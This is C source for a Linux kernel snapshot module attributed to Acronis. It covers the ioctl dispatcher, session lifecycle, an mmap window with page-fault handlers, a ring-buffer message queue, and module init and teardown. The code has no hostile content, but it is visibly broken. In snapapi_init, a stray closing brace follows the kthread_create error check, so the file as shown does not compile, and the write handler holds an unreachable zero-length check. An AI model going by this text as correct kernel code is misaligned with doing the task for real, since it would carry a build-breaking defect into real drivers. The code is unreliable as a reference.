static int session_messqstate(struct session_struct *s, unsigned int *state)
{
	int ret;
	unsigned int out;
	struct list_head *tmp;

	sa_debug(DEBUG_API,"s=%p\n", s);

	ret = -EFAULT;
	out = 0;
	down(&messages_sem);
	spin_lock(&sessions_lock);
	list_for_each(tmp, &sessions_list) {
		struct session_struct *sp;

		sp = list_entry(tmp, struct session_struct, s_list);
		/* one queue per device */
		sa_debug(DEBUG_API,"sp=%p, sp->mess_pos=%d, mess_pos=%d\n", sp,
					sp->s_mess_pos, messages_pos);
		if (sp->s_mess_pos != messages_pos) {
			out = 1;
			goto out_up;
		}
	}
	list_for_each(tmp, &notinited_list) {
		struct session_struct *sp;

		sp = list_entry(tmp, struct session_struct, s_list);
		/* one queue per device */
		sa_debug(DEBUG_API,"sp=%p, sp->mess_pos=%d, mess_pos=%d\n", sp,
					sp->s_mess_pos, messages_pos);
		if (sp->s_mess_pos != messages_pos) {
			out = 1;
			break;
		}
	}
out_up:
	spin_unlock(&sessions_lock);
	up(&messages_sem);
	if (copy_to_user(state, &out, sizeof(*state)))
		goto out;

	ret = 0;
out:
	return ret;
}

static struct inode* sn_get_inode(struct file *filep)
{
#ifdef HAVE_FILE_F_DENTRY
	return filep->f_dentry->d_inode;
#else
	return file_inode(filep);
#endif
}

static struct dentry* sn_get_dentry(struct file *filep)
{
#ifdef HAVE_FILE_F_DENTRY
	return filep->f_dentry;
#else
	return filep->f_path.dentry;
#endif
}

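/* Set S_NOATIME on the inode behind 'fd' so that subsequent reads
 * (e.g. by the backup process) do not update its access time. */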
static int session_resetatime(struct session_struct *s, unsigned int fd)
{
	int ret;
	struct file *file;
	struct inode *inode;

	sa_debug(DEBUG_API,"s=%p\n", s);
	down(&s->s_sem);
	ret = -ESRCH;
	file = fget(fd);
	if (!file)
		goto out_up;
	if (!sn_get_dentry(file) || !sn_get_inode(file))
		goto out_put;
	inode = sn_get_inode(file);
	inode->i_flags |= S_NOATIME;
	ret = 0;
out_put:
	fput(file);
out_up:
	up(&s->s_sem);
	return ret;
}

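/*
 * Main ioctl dispatcher.  Userspace drives it roughly as below (a
 * sketch only: the device node name and values are illustrative, the
 * snapctl_* structures come from the snapapi ioctl header):
 *
 *	int fd = open("/dev/snapapi", O_RDWR);
 *	struct snapctl_init init = { .major = 8, .minor = 1, .prealloc = 0 };
 *	if (ioctl(fd, SNAPCTL_INIT, &init) == 0)
 *		ioctl(fd, SNAPCTL_FREEZE, 0);
 */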
static long snapapi3_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
{
	int err;
	struct session_struct * ss;

	sa_debug(DEBUG_IOCTL, "cmd=%x\n", cmd);
	if (!snap_init_ok)
		return -EPERM;
	ss = file->private_data;
	if (!ss)
		return -EINVAL;
	err = -EFAULT;

	update_ioctl_counters(ss);

	switch (cmd) {
	    case SNAPCTL_INIT: {
			struct snapctl_init s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_init(ss, MKDEV(s.major, s.minor),
								s.prealloc);
		}
		break;
	    case SNAPCTL_FREEZE:
			err = session_freeze(ss);
		break;
	    case SNAPCTL_UNFREEZE:
			err = session_unfreeze(ss);
		break;
	    case SNAPCTL_GETMAP: {
			struct snapctl_getmap s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_getmap(ss, s.map_size, s.map,
					(unsigned long)s.bsize,
					(unsigned long)s.fblock,
					(unsigned long)s.bpgroup,
					(unsigned long)s.gcount);
		}
		break;
	    case SNAPCTL_GETSPARSEDMAP: {
			struct snapctl_getsparsedmap s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_getsparsedmap(ss, s.map_size, s.map,
					(unsigned long)s.bsize,
					(unsigned long)s.fblock,
					(unsigned long)s.bpgroup,
					(unsigned long)s.gcount,
					(unsigned long)s.groups);
		}
		break;
	    case SNAPCTL_LDMAP: {
			struct snapctl_ldmap s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_ldmap(ss, s.map_size, s.map);
		}
		break;
	    case SNAPCTL_GETBNO: {
			struct snapctl_getbno s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_getbno(ss, s.bno);
		}
		break;
	    case SNAPCTL_BFREE: {
			struct snapctl_bfree s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_bfree(ss, s.bstart, s.count);
		}
		break;
	    case SNAPCTL_BREAD: {
			struct snapctl_bread s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_bread(ss, s.bstart, s.count, s.data,
				s.flags,
				&(((struct snapctl_bread*)arg)->bincache));
		}
		break;
	    case SNAPCTL_STATE: {
			struct snapctl_state s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_state(ss, s.state, s.size);
		}
		break;
	    case SNAPCTL_DEVINFO: {
			struct snapctl_devinfo s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_devinfo(ss, MKDEV(s.major, s.minor),
								s.info, s.size);
		}
		break;
	    case SNAPCTL_DEVLOCK: {
			struct snapctl_devlock s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_lockdev(ss, MKDEV(s.major, s.minor), DL_WRITE);
		}
		break;
	    case SNAPCTL_DEVUNLOCK: {
			struct snapctl_devunlock s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_unlockdev(ss, MKDEV(s.major, s.minor), DL_WRITE);
		}
		break;
	    case SNAPCTL_DEVLOCKREAD: {
			struct snapctl_devlockread s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_lockdev(ss, MKDEV(s.major, s.minor), DL_READ);
		}
		break;
	    case SNAPCTL_DEVUNLOCKREAD: {
			struct snapctl_devunlockread s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_unlockdev(ss, MKDEV(s.major, s.minor), DL_READ);
		}
		break;
	    case SNAPCTL_MESSQSTATE: {
			struct snapctl_messqstate s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_messqstate(ss, s.state);
		}
		break;
	    case SNAPCTL_RESETATIME: {
			struct snapctl_resetatime s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_resetatime(ss, s.fd);
		}
		break;
	    case SNAPCTL_RDCACHE: {
			struct snapctl_rdcache s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			err = session_rdcache(ss, s.data, s.size);
		}
		break;
#ifdef USE_VZ_VZSNAP
	    case SNAPCTL_SET_VEID: {
			unsigned int s;
			if (copy_from_user(&s, (void *)arg, sizeof(s)))
				break;
			ss->s_veid = s;
			err = 0;
		}
		break;
#endif
	    default:
		err = -ENOTTY;
		break;
	}
	if (err)
		sa_debug(DEBUG_API, "cmd=%x err=%d\n", cmd, -err);
	return err;
}

#ifndef HAVE_UNLOCKED_IOCTL_IN_FS_H
static int snapapi4_ioctl(struct inode *ino, struct file *file, unsigned int cmd,
		unsigned long arg)
{
	return snapapi3_ioctl(file, cmd, arg);
}
#endif
#ifdef HAVE_IOCTL32_CONVERSION
static int
snapapi_compat_ioctl(unsigned int fd, unsigned int cmd,
			unsigned long arg, struct file *filep)
{
	sa_debug(DEBUG_IOCTL, "cmd=%x\n", cmd);
	return snapapi3_ioctl(filep, cmd, arg);
}
#endif

#ifdef HAVE_COMPAT_IOCTL
static long
snapapi_compat_ioctl(struct file *filep, unsigned int cmd,
			unsigned long arg)
{
	sa_debug(DEBUG_IOCTL, "cmd=%x\n", cmd);
	return snapapi3_ioctl(filep, cmd, arg);
}
#endif

static int snapapi_open(struct inode *ino, struct file *file)
{
	struct session_struct * s;

	sa_debug(DEBUG_API,"%s\n","enter");
	if (!snap_init_ok) {
		sa_warn("snapapi is not inited.%s", "\n");
		return -EPERM;
	}
	s = kmalloc(sizeof(*s), GFP_KERNEL);
	if (!s)
		return -ENOMEM;
	if (!try_module_get(THIS_MODULE)) {
		kfree(s);
		return -ENODEV;
	}
	memset(s, 0, sizeof(*s));
	INIT_LIST_HEAD(&s->s_list);
	sema_init(&s->s_sem, 1); /* unlocked state */
	s->s_heartbeat_active = 0;
	s->s_usemap = 0;
	spin_lock_init(&s->s_misc_lock);
	spin_lock_init(&s->s_biolist_lock);
	spin_lock_init(&s->s_blkcache_emlock);
	spin_lock_init(&s->s_pending_queue.pq_lock);
	spin_lock_init(&s->s_stat_lock);
	atomic_set(&s->s_users, 1);

	down(&messages_sem);
	s->s_mess_pos = messages_pos;
	up(&messages_sem);
	spin_lock(&sessions_lock);
	list_add(&s->s_list, &notinited_list);
	spin_unlock(&sessions_lock);

	file->private_data = s;
	sa_debug(DEBUG_API, "OK s=%p tgid=%d\n", s, current->tgid);
	return 0;
}

static int snapapi_release(struct inode *ino, struct file *file)
{
	struct session_struct * s;

	sa_debug(DEBUG_API,"%s\n","enter");
	s = file->private_data;
	if (!s)
		return -EINVAL;
	file->private_data = NULL;

	close_session(s, 1);
	module_put(THIS_MODULE);
	sa_debug(DEBUG_API, "OK s=%p tgid=%d\n", s, current->tgid);
	return 0;
}

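/*
 * Page faults on the session's mmap window are served from the pages
 * preallocated in snapapi_mmap(); an access beyond the window raises
 * SIGBUS.
 */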
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,26)
#define SN_NOPAGE_SIGBUS NOPAGE_SIGBUS
#else
#define SN_NOPAGE_SIGBUS VM_FAULT_ERROR
#endif

static struct page * snapapi_vm_nopage(struct vm_area_struct * vma,
					unsigned long address, int *unused)
{
	unsigned int i;
	struct session_struct *s;

	if (!vma->vm_file) {
		sa_warn("vma does not have a file attached.%s", "\n");
		return (struct page *)SN_NOPAGE_SIGBUS;
	}
	s = vma->vm_file->private_data;
	sa_debug(DEBUG_API,"s=%p, vma=%p, address=%lx, pgoff=%lu\n", s, vma,
			address, vma->vm_pgoff);

	i = (address - vma->vm_start) >> PAGE_SHIFT;

	if (i >= s->s_msize) {
		sa_warn("Incorrect address.%s", "\n");
		return (struct page *)SN_NOPAGE_SIGBUS;
	}
	get_page(s->s_mpages[i]);
	sa_debug(DEBUG_ALLOC, "s=%p, nopage=%p(%d)\n", s, s->s_mpages[i],
					page_count(s->s_mpages[i]));

	return s->s_mpages[i];
}

#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,6,26)
#ifdef HAVE_VM_FAULT_2ARGS
static VMFAULT_RETURN_VALUE snapapi_vm_fault(struct vm_area_struct * vma, struct vm_fault *vmf)
#else
static VMFAULT_RETURN_VALUE snapapi_vm_fault(struct vm_fault *vmf)
#endif
{
#ifdef HAVE_VMFAULT_VIRTUAL_ADDRESS
	unsigned long address = (unsigned long) vmf->virtual_address;
#else
	unsigned long address = (unsigned long) vmf->address;
#endif

#ifdef HAVE_VM_FAULT_2ARGS
	vmf->page = snapapi_vm_nopage(vma, address, 0);
#else
	vmf->page = snapapi_vm_nopage(vmf->vma, address, 0);
#endif
	if (vmf->page == (struct page *)SN_NOPAGE_SIGBUS)
		return VM_FAULT_ERROR;
	return 0;
}
#endif

static void snapapi_vm_open(struct vm_area_struct * vma)
{
	struct session_struct *s;

	if (!vma->vm_file) {
		sa_warn("vma does not have a file attached.%s", "\n");
		return;
	}
	s = vma->vm_file->private_data;
	sa_debug(DEBUG_API,"s=%p, vma=%p, users=%d\n", s, vma,
				atomic_read(&s->s_vma_users));
	atomic_inc(&s->s_vma_users);
}

static void snapapi_vm_close(struct vm_area_struct * vma)
{
	struct session_struct *s;

	if (!vma->vm_file) {
		sa_warn("vma does not have a file attached.%s", "\n");
		return;
	}
	s = vma->vm_file->private_data;
	sa_debug(DEBUG_API,"s=%p, vma=%p, users=%d\n", s, vma,
				atomic_read(&s->s_vma_users));
	if (!atomic_dec_and_test(&s->s_vma_users))
		return;

	s->s_vma = NULL;
	mpages_destroy(s);
}

static int snapapi_mmap(struct file * file, struct vm_area_struct * vma)
{
	struct session_struct *s;
	int ret, size;
	struct page * page;
	int i;

	s = file->private_data;
	sa_debug(DEBUG_API,"s=%p, vma=%p,%lx-%lx %lx %lx\n", s, vma,
						vma->vm_start, vma->vm_end,
						vma->vm_flags, vma->vm_pgoff);
	if (!s)
		return -EBADF;
	if (!(vma->vm_flags & VM_READ)
			|| (vma->vm_flags & VM_SHARED))
		return -EINVAL;

	ret = -EINVAL;
	down(&s->s_sem);
	if (s->s_vma || s->s_state < SNAP_INITED || vma->vm_pgoff != 0)
		goto out_up;

	ret = -ENOMEM;
	size = (vma->vm_end - vma->vm_start) >> PAGE_SHIFT;
	if (size > s->s_maxmsize || size < 1)
		goto out_up;

	s->s_msize = size; /* mmap size in pages */
	s->s_local_bios = kmalloc(sizeof(struct bio_req) * size, GFP_KERNEL);
	if (!s->s_local_bios)
		goto out_up;
	sa_debug(DEBUG_INTERNALS, "s=%p, mmap pages=%d, local_bios==%p\n", s,
						size, s->s_local_bios);
	memset(s->s_local_bios, 0, sizeof(struct bio_req) * size);

	for (i = 0; i < size; i++) {
		page = alloc_page(GFP_KERNEL);
		if (!page) {
			goto out_destroy;
		}
		inc_get_pages(s);
		s->s_mpages[i] = page;
		sa_debug(DEBUG_ALLOC, "s=%p, alloc page=%p(%d)\n", s,
				page, page_count(page));
	}
	ret = 0;
	s->s_vma = vma;
	vma->vm_ops = &snapctl_vm_ops;
	atomic_set(&s->s_vma_users, 1);
	goto out_up;

out_destroy:
	s->s_vma = NULL;
	mpages_destroy(s);
out_up:
	up(&s->s_sem);
	return ret;
}

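/*
 * The message queue is a fixed ring of MAX_MESSAGES records, each
 * MESSAGE_SIZE bytes.  Writers advance the global messages_pos; each
 * session keeps its own read position (s_mess_pos) and read() returns
 * whatever has accumulated since, never blocking.
 */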
static ssize_t snapapi_read(struct file * filp, char * buf, size_t count,
								loff_t *ppos)
{
	struct session_struct *s;
	ssize_t size, read, ret;
	int idx;

	s = filp->private_data;
	sa_debug(DEBUG_MESS, "s=%p, buf=%p, count=%lu, ppos=%lld\n", s,
				buf, (unsigned long)count, (long long)*ppos);
	if (!s)
		return -EBADF;
	if (count % MESSAGE_SIZE)
		return -EINVAL;
	if (*ppos != filp->f_pos)
		return -ESPIPE;
	/* A zero-length read succeeds.  */
	if (count == 0)
		return 0;
	ret = -ERESTARTSYS;
	down(&s->s_sem);
	if (down_interruptible(&messages_sem))
		goto out_nolock;
	if (signal_pending(current))
		goto out;
	ret = 0;
	/* Always work in NONBLOCK mode */
	if (s->s_mess_pos == messages_pos)
		goto out;
	size = (messages_pos > s->s_mess_pos) ? messages_pos - s->s_mess_pos :
		MAX_MESSAGES - s->s_mess_pos + messages_pos;
	size *= MESSAGE_SIZE;
	if (size > count)
		size = count;
	idx = s->s_mess_pos + 1;
	read = 0;
	ret = -EFAULT;
	while (size > 0) {
		idx %= MAX_MESSAGES;
		if (copy_to_user(buf, &messages_buf[idx++], MESSAGE_SIZE))
			goto out;
		read += MESSAGE_SIZE;
		size -= MESSAGE_SIZE;
	}
	s->s_mess_pos = (idx - 1) % MAX_MESSAGES;
	ret = read;

out:
	up(&messages_sem);
out_nolock:
	up(&s->s_sem);
	return ret;
}

static ssize_t snapapi_write(struct file *filp, const char *buf, size_t count,
								loff_t *ppos)
{
	struct session_struct *s;
	int idx;
	ssize_t ret;

	s = filp->private_data;
	sa_debug(DEBUG_MESS,"s=%p, buf=%p, count=%lu, ppos=%lld, f_pos=%lld\n",
			s, buf, (unsigned long)count, *ppos, filp->f_pos);
	if (!s)
		return -EBADF;
	if (count != MESSAGE_SIZE)
		return -EINVAL;
	if (*ppos != filp->f_pos)
		return -ESPIPE;
	/* Null write succeeds.  */
	if (count == 0)
		return 0;
	ret = -ERESTARTSYS;
	down(&s->s_sem);
	if (down_interruptible(&messages_sem))
		goto out_nolock;
	if (signal_pending(current))
		goto out;
	ret = -EFAULT;
	idx = (messages_pos + 1) % MAX_MESSAGES;
	if (copy_from_user(&messages_buf[idx], buf, MESSAGE_SIZE))
		goto out;
	messages_pos = idx;
	ret =  MESSAGE_SIZE;
	/* Signal readers asynchronously that there is more data.  */
	sa_debug(DEBUG_MESS, "s=%p, wake_up_interruptible\n", s);
	wake_up_interruptible(&select_wait);

out:
	up(&messages_sem);
out_nolock:
	up(&s->s_sem);
	return ret;
}

static unsigned int snapapi_poll(struct file *filp, poll_table *wait)
{
	struct session_struct *s;
	unsigned int mask;

	s = filp->private_data;
	sa_debug(DEBUG_MESS, "s=%p\n", s);
	if (!s)
		return POLLERR;
	poll_wait(filp, &select_wait, wait);
	down(&s->s_sem);
	down(&messages_sem);
	mask = 0;
	if (s->s_mess_pos != messages_pos) {
		sa_debug(DEBUG_MESS,"s=%p, message ready\n", s);
		mask = POLLIN | POLLRDNORM;
	}
	up(&messages_sem);
	up(&s->s_sem);
	return mask;
}

static struct vm_operations_struct snapctl_vm_ops = {
	open:	snapapi_vm_open,
#if LINUX_VERSION_CODE < KERNEL_VERSION(2,6,26)
	nopage:	snapapi_vm_nopage,
#else
	fault:	snapapi_vm_fault,
#endif
	close:	snapapi_vm_close,
};

static struct file_operations snapctl_fops = {
#ifdef HAVE_UNLOCKED_IOCTL_IN_FS_H
	unlocked_ioctl: snapapi3_ioctl,
#else
	ioctl: snapapi4_ioctl,
#endif
	open: snapapi_open,
	read: snapapi_read,
	write: snapapi_write,
	poll: snapapi_poll,
	mmap:  snapapi_mmap,
	release: snapapi_release,
#ifdef HAVE_COMPAT_IOCTL
	compat_ioctl: snapapi_compat_ioctl,
#endif
};

static int snapctl_unload(void)
{
	unregister_chrdev(snapctl_major, SNAPCTL_NAME);
#ifdef HAVE_IOCTL32_CONVERSION
	unregister_ioctl32_conversion(SNAPCTL_INIT);
	unregister_ioctl32_conversion(SNAPCTL_FREEZE);
	unregister_ioctl32_conversion(SNAPCTL_LDMAP);
	unregister_ioctl32_conversion(SNAPCTL_GETMAP);
	unregister_ioctl32_conversion(SNAPCTL_GETBNO);
	unregister_ioctl32_conversion(SNAPCTL_BREAD);
	unregister_ioctl32_conversion(SNAPCTL_BFREE);
	unregister_ioctl32_conversion(SNAPCTL_STATE);
	unregister_ioctl32_conversion(SNAPCTL_DEVINFO);
	unregister_ioctl32_conversion(SNAPCTL_DEVLOCK);
	unregister_ioctl32_conversion(SNAPCTL_DEVUNLOCK);
	unregister_ioctl32_conversion(SNAPCTL_UNFREEZE);
	unregister_ioctl32_conversion(SNAPCTL_MESSQSTATE);
	unregister_ioctl32_conversion(SNAPCTL_RESETATIME);
	unregister_ioctl32_conversion(SNAPCTL_RDCACHE);
	unregister_ioctl32_conversion(SNAPCTL_SET_VEID);
	unregister_ioctl32_conversion(SNAPCTL_START_SWAP_THREAD);
	unregister_ioctl32_conversion(SNAPCTL_STOP_SWAP_THREAD);
	unregister_ioctl32_conversion(SNAPCTL_DEVLOCKREAD);
	unregister_ioctl32_conversion(SNAPCTL_DEVUNLOCKREAD);
#endif
	down(&devlocked_sem);
	if (devlocked) {
		free_page((unsigned long)devlocked);
		devlocked = NULL;
	}
	up(&devlocked_sem);
	down(&messages_sem);
	if (messages_buf) {
		free_page((unsigned long)messages_buf);
		messages_buf = NULL;
	}
	up(&messages_sem);
	if (pid_info_p) {
		free_page((unsigned long)pid_info_p);
		pid_info_p = NULL;
	}
	return 0;
}

static void stop_resolver_thread(void)
{
	resolver_thread_continue = 0;
	wmb();
#ifndef USE_KERNEL_THREAD
	wake_up_process(resolver_thread);
#else
	wake_up_interruptible(&resolver_thread_signal);
#endif
	wait_for_completion(&resolver_thread_exited);
}

static int __init snapapi_init(void)
{
	struct sysinfo i;
	int ret;
	ret = -ENOMEM;

	init_waitqueue_head(&select_wait);
	si_meminfo(&i);
	snap_emergency_size = i.totalram >> 8;

#ifndef USE_KERNEL_THREAD
	resolver_thread = kthread_create(resolver_loop, NULL, "snapapid");
	if (IS_ERR(resolver_thread)) {
		ret = PTR_ERR(resolver_thread);
		goto out_info;
	}
	}
	wake_up_process(resolver_thread);
#else
	resolver_thread_pid = kernel_thread(resolver_loop, NULL, 0);
	if (resolver_thread_pid < 0) {
		ret = resolver_thread_pid;
		goto out_info;
	}
#endif

	messages_buf = (struct snap_message *) get_zeroed_page(GFP_KERNEL);
	if (!messages_buf)
		goto err_mbuf;

	devlocked = (struct locked_dev *) get_zeroed_page(GFP_KERNEL);
	if (!devlocked)
		goto err_devl;

	pid_info_p = (struct sn_pid_info *) get_zeroed_page(GFP_KERNEL);
	if (!pid_info_p)
		goto err_pidinfo;

	snapctl_fops.owner = THIS_MODULE;
	ret = register_chrdev(0, SNAPCTL_NAME, &snapctl_fops);
	if (ret < 0)
		goto err_chrdev;
	snapctl_major = ret;
#ifdef HAVE_IOCTL32_CONVERSION
	register_ioctl32_conversion(SNAPCTL_INIT, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_FREEZE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_LDMAP, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_GETMAP, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_GETBNO, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_BREAD, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_BFREE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_STATE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVINFO, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVLOCK, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVUNLOCK, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_UNFREEZE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_MESSQSTATE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_RESETATIME, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_RDCACHE, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_SET_VEID, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_START_SWAP_THREAD, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_STOP_SWAP_THREAD, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVLOCKREAD, snapapi_compat_ioctl);
	register_ioctl32_conversion(SNAPCTL_DEVUNLOCKREAD, snapapi_compat_ioctl);
#endif
	snap_init_ok = 1;
	ret = 0;

out_info:
	sa_info("Snapapi(v.%d.%d.%d) init %s. Session size %d. Em size %d. "
		"Ctl major %d. chains %d\n", SNAPAPI_VMAJOR, SNAPAPI_VMINOR, SNAPAPI_VSUBMINOR,
		snap_init_ok ? "OK" : "failed",	(int)sizeof(struct session_struct),
		snap_emergency_size, snapctl_major, (int)BLK_CHAINS);
#ifdef HAVE_BDOPS_SUBMIT_BIO
	sa_warn("snapapi26: built for %s kernel using %s.", UTS_RELEASE, SNAPAPI_SYSTEM_MAP);
	if (validate_kernel_version() != 0)
		sa_warn("snapapi26 module was built for another kernel, have %s expecting %s.", utsname()->release, UTS_RELEASE);
#endif
	return ret;

err_chrdev:
	free_page((unsigned long)pid_info_p);
err_pidinfo:
	free_page((unsigned long)devlocked);
err_devl:
	free_page((unsigned long)messages_buf);
err_mbuf:
	stop_resolver_thread();
	goto out_info;
}

static void __exit snapapi_exit(void)
{
	snapctl_unload();
	stop_resolver_thread();
	sa_info("Snapapi unloading...%s", "\n");
}

module_init(snapapi_init);
module_exit(snapapi_exit);
MODULE_AUTHOR("Acronis");
MODULE_DESCRIPTION("Acronis Snapshot kernel API module");
MODULE_LICENSE("GPL");
MODULE_VERSION(SNAPAPI_COMMON_MOD_VERSION);
MODULE_INFO(supported, "external");
